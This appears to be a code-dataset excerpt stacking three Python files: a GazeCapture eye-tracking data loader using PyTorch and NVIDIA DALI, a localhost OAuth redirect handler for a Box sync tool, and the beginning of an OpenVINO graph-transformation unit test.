py
|
Python
|
ITrackerData.py
|
MSREnable/GazeCapture
|
54f00ab428a7dbb51f8f0c37f22bba6b3cb54726
|
[
"RSA-MD"
] | 15
|
2019-08-28T22:06:51.000Z
|
2021-10-08T09:52:13.000Z
|
ITrackerData.py
|
MSREnable/GazeCapture
|
54f00ab428a7dbb51f8f0c37f22bba6b3cb54726
|
[
"RSA-MD"
] | null | null | null |
ITrackerData.py
|
MSREnable/GazeCapture
|
54f00ab428a7dbb51f8f0c37f22bba6b3cb54726
|
[
"RSA-MD"
] | 6
|
2020-11-18T02:46:55.000Z
|
2021-07-08T11:12:11.000Z
|
import torch
import os
import os.path
import scipy.io as sio
import numpy as np
import math
from random import random, shuffle
# CPU data loader
from PIL import Image
import torchvision.transforms as transforms
from utility_functions.Utilities import centered_text
from torch.utils.data.dataloader import default_collate
try:
# GPU data loader
from nvidia.dali.pipeline import Pipeline
import nvidia.dali.ops as ops
import nvidia.dali.types as types
from nvidia.dali.plugin.pytorch import DALIGenericIterator
except ImportError:
# If running on a non-CUDA system, stub out Pipeline to prevent code crash
class Pipeline:
def __init__(self, *args):
return
# If running on a non-CUDA system, stub out DALIGenericIterator to prevent code crash
class DALIGenericIterator:
def __init__(self, *args):
return
def normalize_image_transform(image_size, split, jitter, color_space):
normalize_image = []
# Only for training
if split == 'train':
normalize_image.append(transforms.Resize(240))
if jitter:
normalize_image.append(transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1))
normalize_image.append(transforms.RandomCrop(image_size))
# For training and Eval
normalize_image.append(transforms.Resize(image_size))
normalize_image.append(transforms.ToTensor())
if color_space == 'RGB':
normalize_image.append(transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])) # Well known ImageNet values
return transforms.Compose(normalize_image)
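# Note: for the 'train' split the resulting chain is Resize(240) -> optional
# ColorJitter -> RandomCrop(image_size) -> Resize(image_size) -> ToTensor ->
# Normalize (RGB only); for other splits only the last three steps apply.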
def resize_image_transform(image_size):
normalize_image = []
normalize_image.append(transforms.Resize(image_size))
normalize_image.append(transforms.ToTensor())
return transforms.Compose(normalize_image)
class ExternalSourcePipeline(Pipeline):
def __init__(self, data, batch_size, image_size, split, silent, num_threads, device_id, data_loader, color_space, shuffle=False):
super(ExternalSourcePipeline, self).__init__(batch_size,
num_threads,
device_id)
self.split = split
self.color_space = color_space
self.data_loader = data_loader
if shuffle:
data.shuffle()
self.sourceIterator = iter(data)
self.rowBatch = ops.ExternalSource()
self.imFaceBatch = ops.ExternalSource()
self.imEyeLBatch = ops.ExternalSource()
self.imEyeRBatch = ops.ExternalSource()
self.imFaceGridBatch = ops.ExternalSource()
self.gazeBatch = ops.ExternalSource()
self.indexBatch = ops.ExternalSource()
mean = None
std = None
if color_space == 'RGB':
output_type = types.RGB
mean=[0.485 * 255, 0.456 * 255, 0.406 * 255]
std=[0.229 * 255, 0.224 * 255, 0.225 * 255]
elif color_space == 'YCbCr':
output_type = types.YCbCr
elif color_space == 'L':
output_type = types.GRAY
elif color_space == 'BGR':
output_type = types.BGR
else:
print("Unsupported color_space:", color_space)
# Variation range for Saturation, Contrast, Brightness and Hue
self.dSaturation = ops.Uniform(range=[0.9, 1.1])
self.dContrast = ops.Uniform(range=[0.9, 1.1])
self.dBright = ops.Uniform(range=[0.9, 1.1])
self.dHue = ops.Uniform(range=[-0.1, 0.1])
if data_loader == "cpu":
print("Error: cpu data loader shouldn't be handled by DALI")
else:
# ---------- Decoding Operations --------- #
# ImageDecoder in mixed mode doesn't support YCbCr
# Ref: https://github.com/NVIDIA/DALI/pull/582/files
self.decode = ops.ImageDecoder(device="cpu", output_type=output_type)
# ---------- Augmentation Operations --------- #
# execute rest of the operations on the target device based upon the mode
device = "cpu" if data_loader == "dali_cpu" else "gpu"
self.resize_big = ops.Resize(device=device, resize_x=240, resize_y=240)
            # deprecated: replace with HSV and ops.BrightnessContrast soon
            self.color_jitter = ops.ColorTwist(device=device, image_type=output_type)
            # random area 0.93-1.0 corresponds to cropping randomly from an image of size between (224-240)
self.crop = ops.RandomResizedCrop(device=device, random_area=[0.93, 0.93], size=image_size)
# ---------- Normalization Operations --------- #
self.resize = ops.Resize(device=device, resize_x=image_size[0], resize_y=image_size[1])
self.norm = ops.CropMirrorNormalize(device=device,
output_dtype=types.FLOAT,
output_layout='CHW',
image_type=output_type,
mean=mean,
std=std)
def define_graph(self):
self.row = self.rowBatch()
self.imFace = self.imFaceBatch()
self.imEyeL = self.imEyeLBatch()
self.imEyeR = self.imEyeRBatch()
self.imFaceGrid = self.imFaceGridBatch()
self.gaze = self.gazeBatch()
self.index = self.indexBatch()
sat, con, bri, hue = self.dSaturation(), self.dContrast(), self.dBright(), self.dHue()
def stream(image, augment=True):
# Decoding
image = self.decode(image)
if self.data_loader == "dali_gpu":
image = image.gpu()
# Augmentations (for training only)
if self.split == 'train' and augment:
image = self.resize_big(image)
image = self.color_jitter(image, saturation=sat, contrast=con, brightness=bri, hue=hue)
# Normalize
image = self.resize(image)
image = self.norm(image)
return image
# pass the input through dali stream
imFaceD = stream(self.imFace)
imEyeLD = stream(self.imEyeL)
imEyeRD = stream(self.imEyeR)
imFaceGridD = stream(self.imFaceGrid, False)
return (self.row, imFaceD, imEyeLD, imEyeRD, imFaceGridD, self.gaze, self.index)
@property
def size(self):
return len(self.sourceIterator)
def iter_setup(self):
(rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch,
indexBatch) = self.sourceIterator.next()
self.feed_input(self.row, rowBatch)
self.feed_input(self.imFace, imFaceBatch)
self.feed_input(self.imEyeL, imEyeLBatch)
self.feed_input(self.imEyeR, imEyeRBatch)
self.feed_input(self.imFaceGrid, imFaceGridBatch)
self.feed_input(self.gaze, gazeBatch)
self.feed_input(self.index, indexBatch)
# class ExternalSourcePipeline(Pipeline):
# def __init__(self, data, batch_size, image_size, split, silent, num_threads, device_id, data_loader, color_space, shuffle=False):
# super(ExternalSourcePipeline, self).__init__(batch_size,
# num_threads,
# device_id)
# self.split = split
# self.color_space = color_space
# self.data_loader = data_loader
# if shuffle:
# data.shuffle()
# self.sourceIterator = iter(data)
# self.rowBatch = ops.ExternalSource()
# self.imFaceBatch = ops.ExternalSource()
# self.imEyeLBatch = ops.ExternalSource()
# self.imEyeRBatch = ops.ExternalSource()
# self.imFaceGridBatch = ops.ExternalSource()
# self.gazeBatch = ops.ExternalSource()
# self.indexBatch = ops.ExternalSource()
# self.frameBatch = ops.ExternalSource()
# mean = None
# std = None
# if color_space == 'RGB':
# output_type = types.RGB
# mean=[0.485 * 255, 0.456 * 255, 0.406 * 255]
# std=[0.229 * 255, 0.224 * 255, 0.225 * 255]
# elif color_space == 'YCbCr':
# output_type = types.YCbCr
# elif color_space == 'L':
# output_type = types.GRAY
# elif color_space == 'BGR':
# output_type = types.BGR
# else:
# print("Unsupported color_space:", color_space)
# # Variation range for Saturation, Contrast, Brightness and Hue
# self.dSaturation = ops.Uniform(range=[0.9, 1.1])
# self.dContrast = ops.Uniform(range=[0.9, 1.1])
# self.dBright = ops.Uniform(range=[0.9, 1.1])
# self.dHue = ops.Uniform(range=[-0.1, 0.1])
# if data_loader == "cpu":
# print("Error: cpu data loader shouldn't be handled by DALI")
# else:
# # ---------- Decoding Operations --------- #
# # ImageDecoder in mixed mode doesn't support YCbCr
# # Ref: https://github.com/NVIDIA/DALI/pull/582/files
# self.decode = ops.ImageDecoder(device="cpu", output_type=output_type)
# # ---------- Augmentation Operations --------- #
# # execute rest of the operations on the target device based upon the mode
# device = "cpu" if data_loader == "dali_cpu" else "gpu"
# self.resize_big = ops.Resize(device=device, resize_x=240, resize_y=240)
# # depreciated replace with HSV and ops.BrightnessContrast soon
# self.color_jitter = ops.ColorTwist(device=device, image_type=output_type)
# # random area 0.93-1.0 corresponds to croping randomly from an image of size between (224-240)
# self.crop = ops.RandomResizedCrop(device=device, random_area=[0.93, 0.93], size=image_size)
# # ---------- Normalization Operations --------- #
# self.resize = ops.Resize(device=device, resize_x=image_size[0], resize_y=image_size[1])
# self.norm = ops.CropMirrorNormalize(device=device,
# output_dtype=types.FLOAT,
# output_layout='CHW',
# image_type=output_type,
# mean=mean,
# std=std)
# def define_graph(self):
# self.row = self.rowBatch()
# self.imFace = self.imFaceBatch()
# self.imEyeL = self.imEyeLBatch()
# self.imEyeR = self.imEyeRBatch()
# self.imFaceGrid = self.imFaceGridBatch()
# self.gaze = self.gazeBatch()
# self.index = self.indexBatch()
# self.frame = self.frameBatch()
# sat, con, bri, hue = self.dSaturation(), self.dContrast(), self.dBright(), self.dHue()
# def stream(image, augment=True):
# # Decoding
# image = self.decode(image)
# if self.data_loader == "dali_gpu":
# image = image.gpu()
# # Augmentations (for training only)
# if self.split == 'train' and augment:
# image = self.resize_big(image)
# image = self.color_jitter(image, saturation=sat, contrast=con, brightness=bri, hue=hue)
# # Normalize
# image = self.resize(image)
# image = self.norm(image)
# return image
# # pass the input through dali stream
# imFaceD = stream(self.imFace)
# imEyeLD = stream(self.imEyeL)
# imEyeRD = stream(self.imEyeR)
# imFaceGridD = stream(self.imFaceGrid, False)
# return (self.row, imFaceD, imEyeLD, imEyeRD, imFaceGridD, self.gaze, self.index, self.frame)
# @property
# def size(self):
# return len(self.sourceIterator)
# def iter_setup(self):
# (rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch,
# indexBatch, frameBatch) = self.sourceIterator.next()
# self.feed_input(self.row, rowBatch)
# self.feed_input(self.imFace, imFaceBatch)
# self.feed_input(self.imEyeL, imEyeLBatch)
# self.feed_input(self.imEyeR, imEyeRBatch)
# self.feed_input(self.imFaceGrid, imFaceGridBatch)
# self.feed_input(self.gaze, gazeBatch)
# self.feed_input(self.index, indexBatch)
# self.feed_input(self.frame, frameBatch)
class ITrackerMetadata(object):
def __init__(self, dataPath, silent=True):
if not silent:
print('Loading iTracker dataset')
metadata_file = os.path.join(dataPath, 'metadata.mat')
self.metadata = self.loadMetadata(metadata_file, silent)
def loadMetadata(self, filename, silent):
if filename is None or not os.path.isfile(filename):
raise RuntimeError('There is no such file %s! Provide a valid dataset path.' % filename)
try:
# http://stackoverflow.com/questions/6273634/access-array-contents-from-a-mat-file-loaded-using-scipy-io-loadmat-python
if not silent:
print('\tReading metadata from %s' % filename)
metadata = sio.loadmat(filename, squeeze_me=True, struct_as_record=False)
except:
raise RuntimeError('Could not read metadata file %s! Provide a valid dataset path.' % filename)
return metadata
class Dataset:
def __init__(self, split, data, size, loader):
self.split = split
self.data = data
self.size = size
self.loader = loader
# class ITrackerData(object):
# def __init__(self,
# dataPath,
# metadata,
# batch_size,
# imSize,
# gridSize,
# split,
# silent=True,
# jitter=True,
# color_space='YCbCr',
# data_loader='cpu',
# shard_id=0,
# num_shards=1,
# data_format='V2'):
# self.dataPath = dataPath
# self.metadata = metadata
# self.batch_size = batch_size
# self.imSize = imSize
# self.gridSize = gridSize
# self.color_space = color_space
# self.data_loader = data_loader
# self.index = 0
# self.split = split
# self.data_format = data_format
# # ======= Sharding configuration variables ========
# if num_shards > 0:
# self.num_shards = num_shards
# else:
# raise ValueError("num_shards cannot be negative")
# if shard_id >= 0 and shard_id < self.num_shards:
# self.shard_id = shard_id
# else:
# raise ValueError(f"shard_id should be between 0 and %d i.e. 0 <= shard_id < num_shards."%(num_shards))
# # ====================================================
# if self.split == 'test':
# mask = self.metadata['labelTest']
# elif self.split == 'val':
# mask = self.metadata['labelVal']
# elif self.split == 'train':
# mask = self.metadata['labelTrain']
# elif self.split == 'all':
# mask = np.ones[len(self.metadata)]
# else:
# raise Exception('split should be test, val or train. The value of split was: {}'.format(self.split))
# self.indices = np.argwhere(mask)[:, 0]
# if not silent:
# print('Loaded iTracker dataset split "%s" with %d records.' % (self.split, len(self.indices)))
# if self.data_loader == 'cpu':
# self.normalize_image = normalize_image_transform(image_size=self.imSize, jitter=jitter, split=self.split, color_space=self.color_space)
# self.resize_transform = resize_image_transform(image_size=self.imSize)
# self.mirror_transform = transforms.RandomHorizontalFlip(p=1.0)
# self.mirrorCoordinates = np.array([-1.0, 1.0])
# def __len__(self):
# return math.floor(len(self.indices)/self.num_shards)
# def loadImage(self, path):
# try:
# im = Image.open(path).convert(self.color_space)
# except OSError:
# raise RuntimeError('Could not read image: ' + path)
# return im
# def __getitem__(self, shard_index):
# # mapping for shards: shard index to absolute index
# index = self.shard_id * self.__len__() + shard_index
# rowIndex = self.indices[index]
# recordingNum = self.metadata['labelRecNum'][rowIndex]
# frameIndex = self.metadata['frameIndex'][rowIndex]
# if self.data_format == "V1":
# imFacePath = os.path.join(self.dataPath, '%05d/appleFace/%05d.jpg' % (recordingNum, frameIndex))
# imEyeLPath = os.path.join(self.dataPath, '%05d/appleLeftEye/%05d.jpg' % (recordingNum, frameIndex))
# imEyeRPath = os.path.join(self.dataPath, '%05d/appleRightEye/%05d.jpg' % (recordingNum, frameIndex))
# imFaceGridPath = os.path.join(self.dataPath, '%05d/faceGrid/%05d.jpg' % (recordingNum, frameIndex))
# else:
# # For new V2 format data
# imFacePath = os.path.join(self.dataPath, '%s/appleFace/%s.jpg' % (recordingNum, frameIndex))
# imEyeLPath = os.path.join(self.dataPath, '%s/appleLeftEye/%s.jpg' % (recordingNum, frameIndex))
# imEyeRPath = os.path.join(self.dataPath, '%s/appleRightEye/%s.jpg' % (recordingNum, frameIndex))
# imFaceGridPath = os.path.join(self.dataPath, '%s/faceGrid/%s.jpg' % (recordingNum, frameIndex))
# # Note: Converted from double (float64) to float (float32) as pipeline output is float in MSE calculation
# gaze = np.array([self.metadata['labelDotXCam'][rowIndex], self.metadata['labelDotYCam'][rowIndex]], np.float32)
# # V1
# # frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]])
# # TODO: with new changes this becomes an array of string and makes dataloader grumpy because
# # default_collate metthod only supports primitive datatypes. To Pass strings to dataloader
# # use custom `frame_collate` method
# frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]])
# # faceGrid = self.makeGrid(self.metadata['labelFaceGrid'][rowIndex, :])
# row = np.array([int(rowIndex)])
# index = np.array([int(index)])
# if self.data_loader == 'cpu':
# # Image loading, transformation and normalization happen here
# imFace = self.loadImage(imFacePath)
# imEyeL = self.loadImage(imEyeLPath)
# imEyeR = self.loadImage(imEyeRPath)
# imfaceGrid = self.loadImage(imFaceGridPath)
# # Data Augmentation: Mirroring
# # mirror data with 50% probablity
# if self.split == 'train' and random() >= 0.5:
# imFace = transforms.functional.hflip(imFace)
# imEyeR, imEyeL = transforms.functional.hflip(imEyeL), transforms.functional.hflip(imEyeR)
# imfaceGrid = transforms.functional.hflip(imfaceGrid)
# gaze = self.mirrorCoordinates * gaze
# # Data Augmentation: Random Crop, Color Jitter
# # faceGrid mustn't have these augmentations
# imFace = self.normalize_image(imFace)
# imEyeL = self.normalize_image(imEyeL)
# imEyeR = self.normalize_image(imEyeR)
# imfaceGrid = self.resize_transform(imfaceGrid)
# # to tensor
# row = torch.LongTensor([int(index)])
# # faceGrid = torch.FloatTensor(faceGrid)
# gaze = torch.FloatTensor(gaze)
# return row, imFace, imEyeL, imEyeR, imfaceGrid, gaze, index, frame
# else:
# # image loading, transformation and normalization happen in ExternalDataPipeline
# # we just pass imagePaths
# return row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index, frame
# # TODO: Not in use anymore due to RC. Should eventually be removed
# def makeGrid(self, params):
# gridLen = self.gridSize[0] * self.gridSize[1]
# grid = np.zeros([gridLen, ], np.float32)
# indsY = np.array([i // self.gridSize[0] for i in range(gridLen)])
# indsX = np.array([i % self.gridSize[0] for i in range(gridLen)])
# condX = np.logical_and(indsX >= params[0], indsX < params[0] + params[2])
# condY = np.logical_and(indsY >= params[1], indsY < params[1] + params[3])
# cond = np.logical_and(condX, condY)
# grid[cond] = 1
# return grid
# # used by dali
# def __iter__(self):
# self.size = self.__len__()
# return self
# def shuffle(self):
# shuffle(self.indices)
# def __next__(self):
# rowBatch = []
# imFaceBatch = []
# imEyeLBatch = []
# imEyeRBatch = []
# imFaceGridBatch = []
# gazeBatch = []
# indexBatch = []
# frameBatch = []
# for local_index in range(self.batch_size):
# row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index, frame = self.__getitem__(self.index)
# self.index = (self.index + 1) % self.__len__()
# imFace = open(imFacePath, 'rb')
# imEyeL = open(imEyeLPath, 'rb')
# imEyeR = open(imEyeRPath, 'rb')
# imFaceGrid = open(imFaceGridPath, 'rb')
# rowBatch.append(row)
# imFaceBatch.append(np.frombuffer(imFace.read(), dtype=np.uint8))
# imEyeLBatch.append(np.frombuffer(imEyeL.read(), dtype=np.uint8))
# imEyeRBatch.append(np.frombuffer(imEyeR.read(), dtype=np.uint8))
# imFaceGridBatch.append(np.frombuffer(imFaceGrid.read(), dtype=np.uint8))
# gazeBatch.append(gaze)
# indexBatch.append(index)
# frameBatch.append(frame)
# imFace.close()
# imEyeL.close()
# imEyeR.close()
# imFaceGrid.close()
# return rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch, indexBatch, frameBatch
# # For compatibiity with Python 2
# def next(self):
# return self.__next__()
class ITrackerData(object):
def __init__(self,
dataPath,
metadata,
batch_size,
imSize,
gridSize,
split,
silent=True,
jitter=True,
color_space='YCbCr',
data_loader='cpu',
shard_id=0,
num_shards=1,
data_format='V2'):
self.dataPath = dataPath
self.metadata = metadata
self.batch_size = batch_size
self.imSize = imSize
self.gridSize = gridSize
self.color_space = color_space
self.data_loader = data_loader
self.index = 0
self.split = split
self.data_format = data_format
# ======= Sharding configuration variables ========
if num_shards > 0:
self.num_shards = num_shards
else:
raise ValueError("num_shards cannot be negative")
if shard_id >= 0 and shard_id < self.num_shards:
self.shard_id = shard_id
else:
raise ValueError(f"shard_id should be between 0 and %d i.e. 0 <= shard_id < num_shards."%(num_shards))
# ====================================================
if self.split == 'test':
mask = self.metadata['labelTest']
elif self.split == 'val':
mask = self.metadata['labelVal']
elif self.split == 'train':
mask = self.metadata['labelTrain']
elif self.split == 'all':
            mask = np.ones(len(self.metadata))
else:
raise Exception('split should be test, val or train. The value of split was: {}'.format(self.split))
self.indices = np.argwhere(mask)[:, 0]
if not silent:
print('Loaded iTracker dataset split "%s" with %d records.' % (self.split, len(self.indices)))
if self.data_loader == 'cpu':
self.normalize_image = normalize_image_transform(image_size=self.imSize, jitter=jitter, split=self.split, color_space=self.color_space)
self.resize_transform = resize_image_transform(image_size=self.imSize)
self.mirror_transform = transforms.RandomHorizontalFlip(p=1.0)
self.mirrorCoordinates = np.array([-1.0, 1.0])
def __len__(self):
return math.floor(len(self.indices)/self.num_shards)
def loadImage(self, path):
try:
im = Image.open(path).convert(self.color_space)
except OSError:
raise RuntimeError('Could not read image: ' + path)
return im
def __getitem__(self, shard_index):
# mapping for shards: shard index to absolute index
index = self.shard_id * self.__len__() + shard_index
rowIndex = self.indices[index]
recordingNum = self.metadata['labelRecNum'][rowIndex]
frameIndex = self.metadata['frameIndex'][rowIndex]
if self.data_format == "V1":
imFacePath = os.path.join(self.dataPath, '%05d/appleFace/%05d.jpg' % (recordingNum, frameIndex))
imEyeLPath = os.path.join(self.dataPath, '%05d/appleLeftEye/%05d.jpg' % (recordingNum, frameIndex))
imEyeRPath = os.path.join(self.dataPath, '%05d/appleRightEye/%05d.jpg' % (recordingNum, frameIndex))
imFaceGridPath = os.path.join(self.dataPath, '%05d/faceGrid/%05d.jpg' % (recordingNum, frameIndex))
else:
# For new V2 format data
imFacePath = os.path.join(self.dataPath, '%s/appleFace/%s.jpg' % (recordingNum, frameIndex))
imEyeLPath = os.path.join(self.dataPath, '%s/appleLeftEye/%s.jpg' % (recordingNum, frameIndex))
imEyeRPath = os.path.join(self.dataPath, '%s/appleRightEye/%s.jpg' % (recordingNum, frameIndex))
imFaceGridPath = os.path.join(self.dataPath, '%s/faceGrid/%s.jpg' % (recordingNum, frameIndex))
# Note: Converted from double (float64) to float (float32) as pipeline output is float in MSE calculation
gaze = np.array([self.metadata['labelDotXCam'][rowIndex], self.metadata['labelDotYCam'][rowIndex]], np.float32)
# frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]])
# frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]], np.object)
# faceGrid = self.makeGrid(self.metadata['labelFaceGrid'][rowIndex, :])
row = np.array([int(rowIndex)])
index = np.array([int(index)])
if self.data_loader == 'cpu':
# Image loading, transformation and normalization happen here
imFace = self.loadImage(imFacePath)
imEyeL = self.loadImage(imEyeLPath)
imEyeR = self.loadImage(imEyeRPath)
imfaceGrid = self.loadImage(imFaceGridPath)
# Data Augmentation: Mirroring
            # mirror data with 50% probability
if self.split == 'train' and random() >= 0.5:
imFace = transforms.functional.hflip(imFace)
imEyeR, imEyeL = transforms.functional.hflip(imEyeL), transforms.functional.hflip(imEyeR)
imfaceGrid = transforms.functional.hflip(imfaceGrid)
gaze = self.mirrorCoordinates * gaze
# Data Augmentation: Random Crop, Color Jitter
# faceGrid mustn't have these augmentations
imFace = self.normalize_image(imFace)
imEyeL = self.normalize_image(imEyeL)
imEyeR = self.normalize_image(imEyeR)
imfaceGrid = self.resize_transform(imfaceGrid)
# to tensor
row = torch.LongTensor([int(index)])
# faceGrid = torch.FloatTensor(faceGrid)
gaze = torch.FloatTensor(gaze)
return row, imFace, imEyeL, imEyeR, imfaceGrid, gaze, index
else:
# image loading, transformation and normalization happen in ExternalDataPipeline
# we just pass imagePaths
return row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index
# TODO: Not in use anymore due to RC. Should eventually be removed
def makeGrid(self, params):
gridLen = self.gridSize[0] * self.gridSize[1]
grid = np.zeros([gridLen, ], np.float32)
indsY = np.array([i // self.gridSize[0] for i in range(gridLen)])
indsX = np.array([i % self.gridSize[0] for i in range(gridLen)])
condX = np.logical_and(indsX >= params[0], indsX < params[0] + params[2])
condY = np.logical_and(indsY >= params[1], indsY < params[1] + params[3])
cond = np.logical_and(condX, condY)
grid[cond] = 1
return grid
# used by dali
def __iter__(self):
self.size = self.__len__()
return self
def shuffle(self):
shuffle(self.indices)
def __next__(self):
rowBatch = []
imFaceBatch = []
imEyeLBatch = []
imEyeRBatch = []
imFaceGridBatch = []
gazeBatch = []
indexBatch = []
for local_index in range(self.batch_size):
row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index = self.__getitem__(self.index)
self.index = (self.index + 1) % self.__len__()
imFace = open(imFacePath, 'rb')
imEyeL = open(imEyeLPath, 'rb')
imEyeR = open(imEyeRPath, 'rb')
imFaceGrid = open(imFaceGridPath, 'rb')
rowBatch.append(row)
imFaceBatch.append(np.frombuffer(imFace.read(), dtype=np.uint8))
imEyeLBatch.append(np.frombuffer(imEyeL.read(), dtype=np.uint8))
imEyeRBatch.append(np.frombuffer(imEyeR.read(), dtype=np.uint8))
imFaceGridBatch.append(np.frombuffer(imFaceGrid.read(), dtype=np.uint8))
gazeBatch.append(gaze)
indexBatch.append(index)
imFace.close()
imEyeL.close()
imEyeR.close()
imFaceGrid.close()
return rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch, indexBatch
    # For compatibility with Python 2
def next(self):
return self.__next__()
def load_data(split,
dataPath,
metadata,
image_size,
grid_size,
workers,
batch_size,
verbose,
local_rank,
color_space,
data_loader,
eval_boost,
mode,
data_format):
shuffle = True if split == 'train' else False
# Enable shading here for ddp2 mode only
if mode == "ddp2":
shard_id, num_shards = local_rank[0], torch.cuda.device_count()
else:
shard_id, num_shards = 0, 1
if eval_boost:
batch_size = batch_size if split == 'train' else batch_size * 2
data = ITrackerData(dataPath,
metadata,
batch_size,
image_size,
grid_size,
split,
silent=not verbose,
jitter=True,
color_space=color_space,
data_loader=data_loader,
shard_id=shard_id,
num_shards=num_shards,
data_format=data_format)
size = len(data)
# DALI implementation would do a cross-shard shuffle
    # CPU implementation would do an in-shard shuffle
if data_loader == "cpu":
loader = torch.utils.data.DataLoader(
data,
batch_size=batch_size,
shuffle=True,
num_workers=workers,
pin_memory=True,
collate_fn = custom_collate)
elif data_loader == "dali_gpu" or data_loader == "dali_cpu":
pipes = [ExternalSourcePipeline(data,
batch_size=batch_size,
image_size=image_size,
split=split,
silent=not verbose,
num_threads=8,
device_id=local_rank[0],
data_loader=data_loader,
color_space=color_space,
shuffle=True)]
        # DALI automatically allocates pinned memory wherever possible
        # auto_reset=True resets the iterator after each epoch
        # DALIGenericIterator builds all of the given pipelines internally
loader = DALIGenericIterator(pipes,
                                     ['row', 'imFace', 'imEyeL', 'imEyeR', 'imFaceGrid', 'gaze', 'indices'],
size=len(data),
fill_last_batch=False,
last_batch_padded=True, auto_reset=True)
# loader = DALIGenericIterator(pipes,
# ['row', 'imFace', 'imEyeL', 'imEyeR', 'imFaceGrid', 'gaze', 'indices'],
# size=len(data),
# fill_last_batch=False,
# last_batch_padded=True, auto_reset=True)
else:
raise ValueError(f"Invalid data_loader mode: %s"%(data_loader))
return Dataset(split, data, size, loader)
# Define the custom collate strategy for dataloader
def custom_collate(batch):
return default_collate(batch)
# def custom_collate(batch):
# new_batch = []
# frames = []
# for _batch in batch:
# new_batch.append(_batch[:-1])
# frames.append(_batch[-1])
# return default_collate(new_batch), frames
def load_all_data(path,
image_size,
grid_size,
workers,
batch_size,
verbose,
local_rank,
color_space='YCbCr',
data_loader='cpu',
eval_boost=False,
mode='none',
data_format='V2'):
print(centered_text('Loading Data'))
metadata = ITrackerMetadata(path, silent=not verbose).metadata
splits = ['train', 'val', 'test']
all_data = {
split: load_data(split,
path,
metadata,
image_size,
grid_size,
workers,
batch_size,
verbose,
local_rank,
color_space,
data_loader,
eval_boost,
mode,
data_format)
for split in splits}
return all_data
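# Usage sketch (illustrative only; the path and sizes below are placeholders):
#   all_data = load_all_data('/data/gazecapture', image_size=(224, 224),
#                            grid_size=(25, 25), workers=8, batch_size=64,
#                            verbose=True, local_rank=[0], color_space='RGB',
#                            data_loader='cpu')
#   train_loader = all_data['train'].loader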
| 42.733735
| 149
| 0.570526
|
3680907130497cccd71d6433c1c77714c52df836
| 1,187
|
py
|
Python
|
redirect_server.py
|
ryotosaito/box-sync-for-python
|
2aa65b90b37a443979da834bf83fef45be540d6d
|
[
"MIT"
] | null | null | null |
redirect_server.py
|
ryotosaito/box-sync-for-python
|
2aa65b90b37a443979da834bf83fef45be540d6d
|
[
"MIT"
] | null | null | null |
redirect_server.py
|
ryotosaito/box-sync-for-python
|
2aa65b90b37a443979da834bf83fef45be540d6d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
from http import HTTPStatus
from urllib import parse
code = ''
domain = '127.0.0.1'
port = 5050
url = 'http://' + domain + ':' + str(port) + '/'
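# Single-shot OAuth helper: run() serves exactly one request and returns the
# "code" query parameter captured from the redirect URL by MyHandler.do_GET.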
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
global code
self.send_response(HTTPStatus.OK)
self.send_header('Content-type', 'text/html')
self.end_headers()
query = parse.parse_qs(parse.urlsplit(self.path).query)
if 'code' in query:
code = query['code'][0]
self.wfile.write(b'Return to your application!')
else:
self.wfile.write(b"""
Something went wrong...<br>
Your request didn't contain "code" parameter...
""")
def log_message(self, format, *args):
return
def run(server_class=HTTPServer, handler_class=MyHandler):
server_address = (domain, port)
httpd = server_class(server_address, handler_class)
try:
httpd.handle_request()
except KeyboardInterrupt:
httpd.socket.close()
return code
if __name__ == '__main__':
print(run())
| 25.804348
| 63
| 0.624263
|
654774d5ff03784fe1fa82c06690411cb64a8fb7
| 2,847
|
py
|
Python
|
model-optimizer/unit_tests/extensions/front/tf/ComplexAbsAfterComplex_test.py
|
monroid/openvino
|
8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6
|
[
"Apache-2.0"
] | 2,406
|
2020-04-22T15:47:54.000Z
|
2022-03-31T10:27:37.000Z
|
model-optimizer/unit_tests/extensions/front/tf/ComplexAbsAfterComplex_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 4,948
|
2020-04-22T15:12:39.000Z
|
2022-03-31T18:45:42.000Z
|
model-optimizer/unit_tests/extensions/front/tf/ComplexAbsAfterComplex_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 991
|
2020-04-23T18:21:09.000Z
|
2022-03-31T18:40:57.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from extensions.front.tf.ComplexAbsAfterComplex import ComplexAbsAfterComplex
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph
graph_node_attrs = {
'placeholder_0': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'placeholder_1': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'complex': {'kind': 'op', 'op': 'Complex'},
'complex_abs': {'kind': 'op', 'op': 'ComplexAbs'},
'relu': {'type': 'ReLU', 'kind': 'op', 'op': 'ReLU'},
'output': {'type': None, 'value': None, 'kind': 'op', 'op': 'Result'},
}
graph_edges = [
('placeholder_0', 'complex', {'in': 0}),
('placeholder_1', 'complex', {'in': 1}),
('complex', 'complex_abs', {'in': 0}),
('complex_abs', 'relu'),
